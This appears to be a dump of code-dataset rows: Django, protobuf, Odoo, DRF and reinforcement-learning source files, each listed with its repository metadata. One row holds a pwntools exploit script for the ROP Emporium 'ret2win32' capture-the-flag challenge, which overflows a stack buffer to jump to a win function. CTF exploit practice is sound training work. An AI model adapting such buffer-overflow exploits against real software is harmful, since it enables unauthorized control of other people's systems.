blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ba96bc54e21848c73345987d7adeeb6c34db2b6c | e7a87d9eca87d8be7b23b3a57c1d49f0ad6d20bc | /django_evolution/compat/apps.py | 4d3b0b6371ada68f0f9cff1a5f2c8ad5d844b0dc | [
"BSD-2-Clause"
] | permissive | beanbaginc/django-evolution | 19a775a223b61861f503925216fb236b822122c0 | 756eedeacc41f77111a557fc13dee559cb94f433 | refs/heads/master | 2023-06-22T07:25:32.401292 | 2022-11-10T03:23:50 | 2022-11-10T03:23:50 | 14,189,401 | 22 | 13 | null | 2015-01-07T01:15:08 | 2013-11-07T00:04:43 | Python | UTF-8 | Python | false | false | 6,122 | py | """Compatibility functions for the application registration.
This provides functions for app registration and lookup. These functions
translate to the various versions of Django that are supported.
"""
from __future__ import unicode_literals
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
try:
# Django >= 1.7
from django.apps.config import AppConfig
from django.apps.registry import apps
cache = None
except ImportError:
# Django < 1.7
from django.db.models.loading import cache
apps = None
AppConfig = None
from django_evolution.compat.datastructures import OrderedDict
from django_evolution.compat.models import all_models
def get_app(app_label, emptyOK=False):
    """Look up the app module registered under ``app_label``.

    On Django >= 1.7 this goes through the app registry; on older
    versions it delegates to the legacy app cache.

    Args:
        app_label (str):
            The label for the app containing the models.

        emptyOK (bool, optional):
            Impacts the return value if the app has no models in it.

    Returns:
        module:
        The app's models module, if available. If the app exists but has
        no models module and ``emptyOK`` is set, ``None`` is returned.

    Raises:
        django.core.exceptions.ImproperlyConfigured:
            The app module was not found, or it was found but a models
            module was not and ``emptyOK`` was ``False``.
    """
    if not apps:
        # Django < 1.7: the old app cache implements this lookup directly.
        return cache.get_app(app_label, emptyOK)

    # Django >= 1.7
    try:
        app_config = apps.get_app_config(app_label)
    except LookupError as e:
        # Convert to the exception type callers historically expect.
        raise ImproperlyConfigured(*e.args)

    models_module = app_config.models_module

    if models_module is None and not emptyOK:
        # This is the exact error that Django 1.6 provided.
        raise ImproperlyConfigured(
            'App with label %s is missing a models.py module.'
            % app_label)

    return models_module
def get_apps():
    """Return the list of all installed apps with models.

    On Django >= 1.7 this walks the app registry; on older versions it
    delegates to the legacy app cache.

    Returns:
        list: A list of all the modules containing model classes.
    """
    if not apps:
        # Django < 1.7
        return cache.get_apps()

    # Django >= 1.7: collect the models module of every configured app,
    # skipping apps that do not ship any models.
    modules = []

    for app_config in apps.get_app_configs():
        if app_config.models_module is not None:
            modules.append(app_config.models_module)

    return modules
def is_app_registered(app):
    """Return whether the app registry is tracking a given app.

    Args:
        app (module):
            The app to check for.

    Returns:
        bool:
        ``True`` if the app is tracked by the registry. ``False`` if not.
    """
    if apps:
        # Django >= 1.7: the registry tracks installed apps by module path.
        return apps.is_installed(app.__name__)

    # Django < 1.7: the old cache keeps registered app modules as keys.
    return app in cache.app_store
def register_app(app_label, app):
    """Register a new app in the registry.

    This must be balanced with a :py:func:`unregister_app` call.

    Args:
        app_label (str):
            The label of the app.

        app (module):
            The app module.
    """
    if apps:
        # Django >= 1.7: wrap the raw module in an AppConfig and install
        # it via set_installed_apps(), which unregister_app() later
        # balances with unset_installed_apps().
        #
        # NOTE(review): assumes settings.INSTALLED_APPS is a list here;
        # a tuple would raise TypeError on the `+ [app_config]` -- confirm.
        app_config = AppConfig(app.__name__, app)
        app_config.label = app_label
        app_config.models_module = app
        apps.set_installed_apps(settings.INSTALLED_APPS + [app_config])
    else:
        # Django < 1.7: the old cache maps app modules to their insertion
        # order index.
        cache.app_store[app] = len(cache.app_store)
        # app_labels only exists on some Django < 1.7 versions, so guard
        # the label lookup table update.
        if hasattr(cache, 'app_labels'):
            cache.app_labels[app_label] = app
def unregister_app(app_label):
    """Unregister an app in the registry.

    This must be balanced with a :py:func:`register_app` call.

    Args:
        app_label (str):
            The label of the app to unregister.
    """
    if apps:
        # Django >= 1.7
        #
        # We need to balance the ``set_installed_apps`` from
        # :py:func:`register_app` here.
        apps.unset_installed_apps()
    # Drop every model recorded for this app, then invalidate Django's
    # cached model lookups so stale entries cannot be returned.
    #
    # NOTE(review): assumes ``app_label`` has an entry in ``all_models``
    # (a defaultdict on Django 1.7+); a missing key would raise KeyError
    # on older versions -- confirm callers always register first.
    all_models[app_label].clear()
    clear_app_cache()
def register_app_models(app_label, model_infos, reset=False):
    """Register one or more models under the given app label.

    Unless ``reset`` is set, the models add onto any already registered
    for the app.

    Args:
        app_label (str):
            The label of the app to register the models on.

        model_infos (list):
            A list of ``(model name, model class)`` pairs to register.

        reset (bool, optional):
            If set, the old list will be overwritten with the new list.
    """
    # Django 1.7+ stores these in a defaultdict of OrderedDicts, but
    # earlier versions use a plain dict, so create the per-app entry
    # explicitly when it's missing.
    model_dict = all_models.setdefault(app_label, OrderedDict())

    if reset:
        model_dict.clear()

    # dict.update() with an iterable of pairs preserves insertion order,
    # matching a manual assignment loop.
    model_dict.update(model_infos)

    clear_app_cache()
def unregister_app_model(app_label, model_name):
    """Unregister a model with the given name from the given app.

    Args:
        app_label (str):
            The label of the app containing a model.

        model_name (str):
            The name of the model to unregister.
    """
    app_models = all_models[app_label]
    del app_models[model_name]

    # Invalidate Django's cached model lookups so the removed model can
    # no longer be returned.
    clear_app_cache()
def clear_app_cache():
    """Clear the Django app/models caches.

    This cache is used in Django >= 1.2 to quickly return results when
    fetching models. It needs to be cleared when modifying the model
    registry.
    """
    if apps:
        # Django >= 1.7
        apps.clear_cache()
        return

    # Django >= 1.2, < 1.7
    if hasattr(cache, '_get_models_cache'):
        cache._get_models_cache.clear()
#: Public API of this compatibility module.
#:
#: Previously this list omitted several public helpers defined above
#: (``is_app_registered``, ``register_app``, ``register_app_models``,
#: ``unregister_app``, ``unregister_app_model``), which broke
#: ``from ... import *`` for those names. Adding them is backward
#: compatible (a strict superset).
__all__ = [
    'apps',
    'clear_app_cache',
    'get_app',
    'get_apps',
    'is_app_registered',
    'register_app',
    'register_app_models',
    'unregister_app',
    'unregister_app_model',
]
| [
"christian@beanbaginc.com"
] | christian@beanbaginc.com |
268f750797e1a7249652d7a0247d8f5253ffa2fb | 5ec06dab1409d790496ce082dacb321392b32fe9 | /clients/python/generated/test/test_org_apache_sling_caconfig_impl_configuration_resolver_impl_info.py | 6e1f1ee41c0859498fa2cb56c04756c1d3068ad7 | [
"Apache-2.0"
] | permissive | shinesolutions/swagger-aem-osgi | e9d2385f44bee70e5bbdc0d577e99a9f2525266f | c2f6e076971d2592c1cbd3f70695c679e807396b | refs/heads/master | 2022-10-29T13:07:40.422092 | 2021-04-09T07:46:03 | 2021-04-09T07:46:03 | 190,217,155 | 3 | 3 | Apache-2.0 | 2022-10-05T03:26:20 | 2019-06-04T14:23:28 | null | UTF-8 | Python | false | false | 1,345 | py | # coding: utf-8
"""
Adobe Experience Manager OSGI config (AEM) API
Swagger AEM OSGI is an OpenAPI specification for Adobe Experience Manager (AEM) OSGI Configurations API # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: opensource@shinesolutions.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import swaggeraemosgi
from swaggeraemosgi.models.org_apache_sling_caconfig_impl_configuration_resolver_impl_info import OrgApacheSlingCaconfigImplConfigurationResolverImplInfo # noqa: E501
from swaggeraemosgi.rest import ApiException
class TestOrgApacheSlingCaconfigImplConfigurationResolverImplInfo(unittest.TestCase):
    """OrgApacheSlingCaconfigImplConfigurationResolverImplInfo unit test stubs"""
    # Generated by openapi-generator: intentionally empty fixtures; fill in
    # setUp/tearDown only if the model under test ever needs shared state.
    def setUp(self):
        pass
    def tearDown(self):
        pass
    def testOrgApacheSlingCaconfigImplConfigurationResolverImplInfo(self):
        """Test OrgApacheSlingCaconfigImplConfigurationResolverImplInfo"""
        # FIXME: construct object with mandatory attributes with example values
        # model = swaggeraemosgi.models.org_apache_sling_caconfig_impl_configuration_resolver_impl_info.OrgApacheSlingCaconfigImplConfigurationResolverImplInfo() # noqa: E501
        pass
if __name__ == '__main__':
    unittest.main()
| [
"michael.bloch@shinesolutions.com"
] | michael.bloch@shinesolutions.com |
a1dc08be45495a4750667ad658b66fe840bd1528 | 1b19103c7781c31b4042e5404eea46fa90014a70 | /cenit_learnifier_api_1_1_0/models/config.py | 46db87206b9fdca0f2085e8f92dc0a166911f7e3 | [] | no_license | andhit-r/odoo-integrations | c209797d57320f9e49271967297d3a199bc82ff5 | dee7edc4e9cdcc92e2a8a3e9c34fac94921d32c0 | refs/heads/8.0 | 2021-01-12T05:52:26.101701 | 2016-12-22T03:06:52 | 2016-12-22T03:06:52 | 77,223,257 | 0 | 1 | null | 2016-12-23T12:11:08 | 2016-12-23T12:11:08 | null | UTF-8 | Python | false | false | 2,516 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010, 2014 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from openerp import models, fields
_logger = logging.getLogger(__name__)

# Coordinates of the Cenit collection installed by the settings model below.
COLLECTION_NAME = "learnifier_api_1_1_0"
COLLECTION_VERSION = "0.1"
COLLECTION_PARAMS = {
    # WITHOUT COLLECTION_PARAMS.
}
class CenitIntegrationSettings(models.TransientModel):
    """Transient settings model that installs the Learnifier Cenit collection."""
    _name = "cenit.learnifier_api_1_1_0.settings"
    _inherit = 'res.config.settings'
    ############################################################################
    # Pull Parameters
    ############################################################################
    # WITHOUT PULL PARAMETERS.
    ############################################################################
    # Default Getters
    ############################################################################
    # WITHOUT GETTERS.
    ############################################################################
    # Default Setters
    ############################################################################
    # WITHOUT SETTERS.
    ############################################################################
    # Actions
    ############################################################################
    def install(self, cr, uid, context=None):
        # Resolve the pinned collection version, then install by name.
        installer = self.pool.get('cenit.collection.installer')
        data = installer.get_collection_data(
            cr, uid,
            COLLECTION_NAME,
            version = COLLECTION_VERSION,
            context = context
        )
        # NOTE(review): ``data`` is never used; confirm whether
        # get_collection_data() is needed for its side effects, otherwise
        # that call can be dropped.
        installer.install_collection(cr, uid, {'name': COLLECTION_NAME})
| [
"sanchocuba@gmail.com"
] | sanchocuba@gmail.com |
27726be64a543a5d321945af0c9442e9b320c003 | 74d66269984cec1527dbfb5aa9772775e2198ad6 | /examples/framework_examples/dqn_apex.py | 42bdec84702b7a4b2522097834c9976c900b3c83 | [
"MIT"
] | permissive | Silas-Asamoah/machin | 34dfa0717ba266a70e7ae11d60bf0055f222b2b3 | af1b5d825e27a98deab7130eedbe1c2505dacf9d | refs/heads/master | 2023-01-28T21:17:42.690424 | 2020-12-05T09:18:36 | 2020-12-05T09:18:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,177 | py | from machin.frame.helpers.servers import model_server_helper
from machin.frame.algorithms import DQNApex
from machin.parallel.distributed import World
from machin.utils.logging import default_logger as logger
from torch.multiprocessing import spawn
from time import sleep
import gym
import torch as t
import torch.nn as nn
class QNet(nn.Module):
    """Small fully-connected Q-network.

    Maps an observation vector of size ``state_dim`` to one raw Q-value
    per discrete action, through two 16-unit ReLU hidden layers.
    """

    def __init__(self, state_dim, action_num):
        super(QNet, self).__init__()
        # state_dim -> 16 -> 16 -> action_num
        self.fc1 = nn.Linear(state_dim, 16)
        self.fc2 = nn.Linear(16, 16)
        self.fc3 = nn.Linear(16, action_num)

    def forward(self, state):
        # Two ReLU hidden layers followed by a linear output head.
        return self.fc3(t.relu(self.fc2(t.relu(self.fc1(state)))))
def main(rank):
    """Run one of the four Ape-X DQN processes.

    Ranks 0 and 1 act as environment workers (samplers) that feed the
    distributed replay buffer; ranks 2 and 3 run learner update loops.

    Args:
        rank (int): This process's index in the 4-process world.
    """
    env = gym.make("CartPole-v0")
    observe_dim = 4
    action_num = 2
    max_episodes = 2000
    max_steps = 200
    solved_reward = 190
    solved_repeat = 5
    # initialize the distributed world first
    world = World(world_size=4, rank=rank,
                  name=str(rank), rpc_timeout=20)
    servers = model_server_helper(model_num=1)
    apex_group = world.create_rpc_group("apex", ["0", "1", "2", "3"])
    q_net = QNet(observe_dim, action_num)
    q_net_t = QNet(observe_dim, action_num)
    dqn_apex = DQNApex(q_net, q_net_t,
                       t.optim.Adam,
                       nn.MSELoss(reduction='sum'),
                       apex_group,
                       servers)
    # synchronize all processes in the group, make sure
    # distributed buffer has been created on all processes in apex_group
    apex_group.barrier()
    # manually control syncing to improve performance
    dqn_apex.set_sync(False)
    if rank in (0, 1):
        # Process 0 and 1 are workers(samplers)
        # begin training
        episode, step, reward_fulfilled = 0, 0, 0
        smoothed_total_reward = 0
        while episode < max_episodes:
            # sleep to wait for learners keep up
            sleep(0.1)
            episode += 1
            total_reward = 0
            terminal = False
            step = 0
            state = t.tensor(env.reset(), dtype=t.float32).view(1, observe_dim)
            # manually pull the newest parameters
            dqn_apex.manual_sync()
            while not terminal and step <= max_steps:
                step += 1
                with t.no_grad():
                    old_state = state
                    # agent model inference
                    action = dqn_apex.act_discrete_with_noise(
                        {"state": old_state}
                    )
                    state, reward, terminal, _ = env.step(action.item())
                    state = t.tensor(state, dtype=t.float32)\
                        .view(1, observe_dim)
                    total_reward += reward
                    # push the transition into the distributed replay buffer
                    dqn_apex.store_transition({
                        "state": {"state": old_state},
                        "action": {"action": action},
                        "next_state": {"state": state},
                        "reward": reward,
                        "terminal": terminal or step == max_steps
                    })
            # exponential moving average of episode reward (0.9 decay)
            smoothed_total_reward = (smoothed_total_reward * 0.9 +
                                     total_reward * 0.1)
            logger.info("Process {} Episode {} total reward={:.2f}"
                        .format(rank, episode, smoothed_total_reward))
            if smoothed_total_reward > solved_reward:
                reward_fulfilled += 1
                if reward_fulfilled >= solved_repeat:
                    logger.info("Environment solved!")
                    # will cause torch RPC to complain
                    # since other processes may have not finished yet.
                    # just for demonstration.
                    exit(0)
            else:
                reward_fulfilled = 0
    elif rank in (2, 3):
        # wait for enough samples
        while dqn_apex.replay_buffer.all_size() < 500:
            sleep(0.1)
        # learners update forever; the demo relies on exit(0) above
        while True:
            dqn_apex.update()
if __name__ == "__main__":
    # Spawn 4 sub-processes, each running main() with its rank:
    # processes 0 and 1 will be workers (samplers),
    # processes 2 and 3 will be learners.
    spawn(main, nprocs=4)
| [
"hanhanmumuqq@163.com"
] | hanhanmumuqq@163.com |
bedae5fc6afce8230f9020cf03d6faa9d338190f | 3b11a2535689377b63717a9086d2075e0443a1f7 | /backend/home/migrations/0001_load_initial_data.py | 43b8b03911ca58c6189c200ef9cbc035c11a9c5a | [] | no_license | Maria7786/mute-dawn-31229 | 80aa3d6a3d56987edd092a5e23e494a94d2ec878 | 85c408914566443049d9b4ed90fd6bb95896bde2 | refs/heads/master | 2023-08-12T02:28:53.782642 | 2021-10-08T06:31:03 | 2021-10-08T06:31:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | from django.db import migrations
def create_site(apps, schema_editor):
    """Create or update the default ``django.contrib.sites`` Site record.

    Uses the historical model from the migration's app registry and
    upserts the row with primary key 1.
    """
    site_model = apps.get_model("sites", "Site")

    custom_domain = "mute-dawn-31229.botics.co"

    defaults = {"name": "Mute Dawn"}
    if custom_domain:
        defaults["domain"] = custom_domain

    site_model.objects.update_or_create(defaults=defaults, id=1)
class Migration(migrations.Migration):
    # Depends on the sites framework's migrations so the Site table exists
    # before create_site() touches it.
    dependencies = [
        ("sites", "0002_alter_domain_unique"),
    ]
    # NOTE(review): no reverse_code is supplied, so this migration is
    # irreversible -- confirm that is intended.
    operations = [
        migrations.RunPython(create_site),
    ]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
c1647c310f7856e0d4e48b1f44eae86b399b09a7 | 2cc6d07914e4b46f5a1f46c616fd0260f1edf646 | /docker-task/ret2win32/bin/ret2win32.py | af96e7d5608af8c208bc9361c997650863f979ce | [] | no_license | qingyiangran/rop_emporium | 17abc26f048fab749745f5e9655b0086993f14f2 | 98a16f274eabd245eb00ffc50d1fc2b6aa1947ee | refs/heads/master | 2022-09-30T19:21:53.710952 | 2020-06-08T06:24:11 | 2020-06-08T06:24:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,422 | py | #!/usr/bin/python
#coding=utf-8
#__author__:TaQini
from pwn import *
# Target binary and libc paths for the ROP Emporium "ret2win32" challenge.
local_file = './ret2win32'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = local_libc # '../libc.so.6'
# Decide local vs remote target from argv: no args -> spawn the local
# binary; "host port" or "host:port" -> connect remotely.
is_local = False
is_remote = False
if len(sys.argv) == 1:
    is_local = True
    p = process(local_file)
    libc = ELF(local_libc)
elif len(sys.argv) > 1:
    is_remote = True
    if len(sys.argv) == 3:
        host = sys.argv[1]
        port = sys.argv[2]
    else:
        host, port = sys.argv[1].split(':')
    p = remote(host, port)
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
# Short-hand wrappers around the pwntools tube API.
se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
    # Attach gdb only when running against the local process.
    if is_local: gdb.attach(p,cmd)
# Address of the ret2win() win function in the target binary.
ret2win = 0x804865f
# rop1: 44 bytes of padding up to the saved return address, then the
# address of ret2win().
# NOTE(review): this is a 32-bit target, so p32() would be conventional;
# p64() appends 4 extra NUL bytes after the 4-byte address. EIP still
# takes the first 4 bytes, so the exploit works -- confirm before changing.
offset = 44
payload = 'A'*offset
payload += p64(ret2win)
# debug()
sl(payload)
p.interactive()
| [
"742954809@qq.com"
] | 742954809@qq.com |
d5abedab589ced124c3687f1c1bc19016d446727 | 45489e34d62e2b4a1f940e02a05d2d02fec22209 | /SpiderKingdom/urls.py | d787e02a160e3db9b868403d08c0d71526e13922 | [] | no_license | yin6516008/TS | 3dde76a9ef9682578441df8f1c72df236567902a | 9f83d7fcf4a2ee9d729892be2c02b2b09361aae2 | refs/heads/master | 2020-03-24T17:32:00.035079 | 2018-08-01T10:30:44 | 2018-08-01T10:30:44 | 142,862,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 747 | py | from django.conf.urls import url
from django.conf.urls import include
from SpiderKingdom import views
from rest_framework import routers
from SpiderKingdom import views
# DRF router that auto-generates list/detail routes for each ViewSet.
router = routers.DefaultRouter()
router.register(r'users', views.UserViewSet)
router.register(r'groups', views.GroupViewSet)
router.register(r'domains', views.DomainViewSet)
router.register(r'projects', views.ProjectViewSet)
router.register(r'status_codes', views.StatusCodeViewSet)
router.register(r'cdns', views.CDNViewSet)
router.register(r'nodes', views.NodeViewSet)
urlpatterns = [
    # url(r'^api/domain', views.domain),
    # All router-managed endpoints live under /api/; /api-auth/ provides
    # DRF's browsable-API login/logout views.
    url(r'^api/', include(router.urls)),
    url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
]
"root@localhost.localdomain"
] | root@localhost.localdomain |
8fa3718facd97ec9c61d956e50fe22639699156e | c2c03e034513a766c7de8298be428fb3eab3ab7b | /chainerrl/NeverSay20/env/bin/f2py | 4ecd45b705ee1bd2aae9806f80f61bb6ef1b1145 | [] | no_license | hamko/sample | 434adeca12e11587edce8cad799162b84c7f5071 | 9b0624b99e3e551d6b72b632d3a7d1a38aac7a9f | refs/heads/master | 2021-01-17T02:51:25.174354 | 2018-10-23T02:40:04 | 2018-10-23T02:40:04 | 9,640,383 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 800 | #!/home/hamko/git/sample/chainerrl/TicTacToe/env/bin/python3
# See http://cens.ioc.ee/projects/f2py2e/
from __future__ import division, print_function
import os
import sys
# Pick the f2py backend from a --<mode> command-line flag, removing the
# flag from argv. If no flag matches, the loop completes without break
# and ``mode`` is left bound to the last list element, "2e-numpy".
for mode in ["g3-numpy", "2e-numeric", "2e-numarray", "2e-numpy"]:
    try:
        i = sys.argv.index("--" + mode)
        del sys.argv[i]
        break
    except ValueError:
        pass
os.environ["NO_SCIPY_IMPORT"] = "f2py"
# Dispatch to the matching backend's main(); unsupported modes exit with
# an error on stderr.
if mode == "g3-numpy":
    sys.stderr.write("G3 f2py support is not implemented, yet.\\n")
    sys.exit(1)
elif mode == "2e-numeric":
    from f2py2e import main
elif mode == "2e-numarray":
    sys.argv.append("-DNUMARRAY")
    from f2py2e import main
elif mode == "2e-numpy":
    from numpy.f2py import main
else:
    sys.stderr.write("Unknown mode: " + repr(mode) + "\\n")
    sys.exit(1)
main()
| [
"wakataberyo@gmail.com"
] | wakataberyo@gmail.com | |
e53ad4103953f54232b6f350f6e9129a291a2e1c | 0a1f8957a798006deaa53d10d09f733fab1e6b05 | /bin/Python27/Lib/site-packages/omniORBpy-4.2.0/lib/python/omniORB/COS/CosTypedNotifyChannelAdmin__POA/__init__.py | 274eb1c95e96e81dcde9e097b1e0a4dcbd0ab9b1 | [
"LicenseRef-scancode-other-permissive"
] | permissive | metamorph-inc/meta-core | a89504ccb1ed2f97cc6e792ba52e3a6df349efef | bc7a05e04c7901f477fe553c59e478a837116d92 | refs/heads/master | 2023-03-07T02:52:57.262506 | 2023-03-01T18:49:49 | 2023-03-01T18:49:49 | 40,361,476 | 25 | 15 | NOASSERTION | 2023-01-13T16:54:30 | 2015-08-07T13:21:24 | Python | UTF-8 | Python | false | false | 301 | py | # DO NOT EDIT THIS FILE!
#
# Python module CosTypedNotifyChannelAdmin__POA generated by omniidl
import omniORB
omniORB.updateModule("CosTypedNotifyChannelAdmin__POA")
# ** 1. Stub files contributing to this module
import CosTypedNotifyChannelAdmin_idl
# ** 2. Sub-modules
# ** 3. End
| [
"kevin.m.smyth@gmail.com"
] | kevin.m.smyth@gmail.com |
099019d67635e8959d837c8791dbfe078e97ed65 | b41dbe2c3223e22f1fbd834fa1b74ec484702534 | /setup.py | aaa4eae972614b13522dcee31057104e77f1712b | [] | no_license | kwoolter/gpx_analysis | f12d30e5416f525d39f7109bceb2ad9f60bd06a9 | 2d809ace82d96b3fbcd2d3cd61ce1d142c3e6c0c | refs/heads/master | 2022-09-07T13:14:16.289614 | 2020-05-19T09:03:43 | 2020-05-19T09:03:43 | 264,803,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | from setuptools import setup
# Packaging metadata for the gpx_analysis package.
# NOTE(review): version/url/license/author_email/description are empty;
# setuptools accepts this for local installs, but a PyPI release would
# need them filled in -- confirm intended.
setup(
    name='gpx_analysis',
    version='',
    packages=['gpx_analysis'],
    url='',
    license='',
    author='kwoolter',
    author_email='',
    description='',
    install_requires = ['pandas', 'gpxpy']
)
| [
"keith.woolterton@gmail.com"
] | keith.woolterton@gmail.com |
88544e4dcca7e40ad343bee1ddd2615bc291628b | 4ede96380f20c65e014f7e5748789c81a4700115 | /complex/complex_pb2.py | ff516978458d5fdd60ba76304e68e746e4c84f0b | [] | no_license | DavidWalshe93/Python_Protobuf | 1724689fc4d24c51d2bf40cb5ac2655355ed9aae | 1af5ecf7ac9fd479b7e283d9cb5ef1c5dd54a94a | refs/heads/master | 2022-04-20T08:04:38.660161 | 2020-04-18T00:26:51 | 2020-04-18T00:26:51 | 256,630,826 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | true | 4,187 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: complex.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
# File-level descriptor for complex.proto (package example.complex).
# ``serialized_pb`` is the wire-format FileDescriptorProto emitted by
# protoc; regenerate with protoc instead of editing it by hand.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='complex.proto',
  package='example.complex',
  syntax='proto3',
  serialized_options=b'Z\tcomplexpb',
  serialized_pb=b'\n\rcomplex.proto\x12\x0f\x65xample.complex\"y\n\x0e\x43omplexMessage\x12\x30\n\tone_dummy\x18\x02 \x01(\x0b\x32\x1d.example.complex.DummyMessage\x12\x35\n\x0emultiple_dummy\x18\x03 \x03(\x0b\x32\x1d.example.complex.DummyMessage\"(\n\x0c\x44ummyMessage\x12\n\n\x02id\x18\x01 \x01(\x05\x12\x0c\n\x04name\x18\x02 \x01(\tB\x0bZ\tcomplexpbb\x06proto3'
)
# Generated descriptor for ComplexMessage: a singular message field
# ``one_dummy`` (field number 2) and a repeated message field
# ``multiple_dummy`` (field number 3), both of type DummyMessage.
_COMPLEXMESSAGE = _descriptor.Descriptor(
  name='ComplexMessage',
  full_name='example.complex.ComplexMessage',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='one_dummy', full_name='example.complex.ComplexMessage.one_dummy', index=0,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='multiple_dummy', full_name='example.complex.ComplexMessage.multiple_dummy', index=1,
      number=3, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=34,
  serialized_end=155,
)
# Generated descriptor for DummyMessage: an int32 ``id`` (field number 1)
# and a string ``name`` (field number 2).
_DUMMYMESSAGE = _descriptor.Descriptor(
  name='DummyMessage',
  full_name='example.complex.DummyMessage',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='id', full_name='example.complex.DummyMessage.id', index=0,
      number=1, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='name', full_name='example.complex.DummyMessage.name', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=157,
  serialized_end=197,
)
# Resolve cross-references between the descriptors, register them with
# the default symbol database, then materialize the concrete Python
# message classes through the generated-protocol metaclass.
_COMPLEXMESSAGE.fields_by_name['one_dummy'].message_type = _DUMMYMESSAGE
_COMPLEXMESSAGE.fields_by_name['multiple_dummy'].message_type = _DUMMYMESSAGE
DESCRIPTOR.message_types_by_name['ComplexMessage'] = _COMPLEXMESSAGE
DESCRIPTOR.message_types_by_name['DummyMessage'] = _DUMMYMESSAGE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ComplexMessage = _reflection.GeneratedProtocolMessageType('ComplexMessage', (_message.Message,), {
  'DESCRIPTOR' : _COMPLEXMESSAGE,
  '__module__' : 'complex_pb2'
  # @@protoc_insertion_point(class_scope:example.complex.ComplexMessage)
  })
_sym_db.RegisterMessage(ComplexMessage)
DummyMessage = _reflection.GeneratedProtocolMessageType('DummyMessage', (_message.Message,), {
  'DESCRIPTOR' : _DUMMYMESSAGE,
  '__module__' : 'complex_pb2'
  # @@protoc_insertion_point(class_scope:example.complex.DummyMessage)
  })
_sym_db.RegisterMessage(DummyMessage)
DESCRIPTOR._options = None
| [
"david.walshe93@gmail.com"
] | david.walshe93@gmail.com |
